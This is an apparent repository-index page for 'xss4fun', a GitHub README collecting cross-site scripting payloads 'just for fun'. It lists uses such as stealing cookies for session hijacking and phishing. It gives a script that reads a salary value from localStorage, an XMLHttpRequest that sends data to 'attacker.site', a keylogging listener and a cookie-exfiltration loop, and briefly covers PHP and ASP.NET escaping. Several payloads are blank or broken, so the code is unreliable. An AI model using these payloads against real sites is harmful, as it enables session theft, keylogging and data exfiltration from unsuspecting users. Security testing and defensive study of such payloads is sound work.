https://github.com/p1ngul1n0/xss4fun
XSS payloads just for fun.
https://github.com/p1ngul1n0/xss4fun
cross-site-scripting pentest pentesting web xss
Last synced: 3 months ago
JSON representation
XSS payloads just for fun.
- Host: GitHub
- URL: https://github.com/p1ngul1n0/xss4fun
- Owner: p1ngul1n0
- Created: 2020-03-12T17:47:47.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2021-04-25T01:29:42.000Z (about 5 years ago)
- Last Synced: 2025-10-24T15:57:08.895Z (8 months ago)
- Topics: cross-site-scripting, pentest, pentesting, web, xss
- Language: Python
- Homepage:
- Size: 33.2 KB
- Stars: 6
- Watchers: 0
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# XSS4FUN :cookie:
Cross-Site-Scripting just for fun.
## Cross-Site-Scripting Utils:
- Steal cookies for session hijacking.
- Modify Webpage to perform phishing.
- Inject malicious code.
## Basic payloads:
- alert(1)
## Useful payloads:
- ** **
- To include malicious javascript code in page.
- **\
**
- When the **** is being filtered by the Web Application, you can use javascript events.
- **<script>alert(localStorage.getItem('salary'))**
- To collect sensitive information stored in Browser Local Storage.
- **
**
- This payload starts a loop, so the browser start sending multiple requests to the attacker server with the cookie.
## Javascript useful codes:
- To perform HTTP GET request
```
var xhttp = new XMLHttpRequest(); //Init xhttp object
xhttp.open("GET", "https://attacker.site/strokes.php?data=data, true); //GET request
xhttp.send(); //Send request
```
- Collect pressed key
```
document.addEventListener("keydown",function(e){
pressed_key = e.key;
}
```
## Mitigations
## PHP
Using **htmlspecialchars** to convert special characters to HTML.
```
$word = htmlspecialchars($_GET['word']);
```
## ASP NET
Using **HtmlEncode** to convert special characters to HTML.
```
user_input = System.Web.HttpUtility.HtmlEncode(user_input);
```
So this **alert(1)** becomes this **\<script\>alert(1)\</script>**
## Automated Detection
## xss4fun.py
Using selenium to find input fields and inject payloads, if the injection is sucessful, a printscreen is made.
## References
- ASP NET Server.HTMLEncode https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525347%28v%3dvs.90%29
- PHP html specialchars https://www.php.net/manual/en/function.htmlspecialchars.php